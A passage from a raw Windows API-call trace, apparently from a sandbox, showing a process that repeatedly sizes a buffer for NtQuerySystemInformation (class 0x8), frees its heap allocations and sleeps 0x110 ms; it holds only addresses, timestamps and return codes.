ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.162] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0247.162] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.162] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.162] Sleep (dwMilliseconds=0x110) [0247.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0247.172] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0247.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0247.172] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0247.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0247.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0247.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0247.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0247.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.174] Sleep (dwMilliseconds=0x110) [0247.186] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0247.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.186] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0247.186] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0247.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0247.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0247.187] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0247.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0247.187] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0247.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.188] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.188] Sleep (dwMilliseconds=0x110) [0247.201] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0247.201] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.201] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0247.201] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0247.201] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0247.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0247.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0247.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0247.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.203] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0247.203] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.203] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.203] Sleep (dwMilliseconds=0x110) [0247.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0247.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0247.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0247.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0247.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0247.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0247.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0247.222] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.223] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0247.223] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.223] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.223] Sleep (dwMilliseconds=0x110) [0247.235] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0247.235] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0247.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0247.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0247.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0247.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0247.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0247.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0247.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.238] Sleep (dwMilliseconds=0x110) [0247.247] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0247.247] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.248] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0247.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0247.248] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0247.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0247.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0247.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0247.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0247.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.253] Sleep (dwMilliseconds=0x110) [0247.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0247.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0247.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0247.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0247.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0247.269] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0247.270] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0247.270] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0247.270] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.270] Sleep (dwMilliseconds=0x110) [0247.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0247.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0247.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0247.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0247.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0247.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0247.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0247.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0247.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.285] Sleep (dwMilliseconds=0x110) [0247.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0247.301] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.302] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0247.302] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0247.302] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.302] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0247.302] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0247.302] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.303] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0247.303] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0247.303] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.303] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0247.303] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.304] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.304] Sleep (dwMilliseconds=0x110) [0247.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0247.313] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0247.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0247.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0247.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0247.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0247.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0247.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0247.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.316] Sleep (dwMilliseconds=0x110) [0247.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0247.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0247.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0247.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0247.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0247.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0247.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0247.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0247.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.377] Sleep (dwMilliseconds=0x110) [0247.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0247.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0247.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0247.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0247.395] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0247.395] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0247.395] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0247.395] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.396] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0247.396] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.396] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.396] Sleep (dwMilliseconds=0x110) [0247.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0247.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0247.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0247.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0247.410] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0247.410] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0247.410] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0247.410] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.411] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0247.411] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.411] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.411] Sleep (dwMilliseconds=0x110) [0247.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0247.440] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0247.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0247.441] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0247.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0247.442] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.442] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0247.442] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, 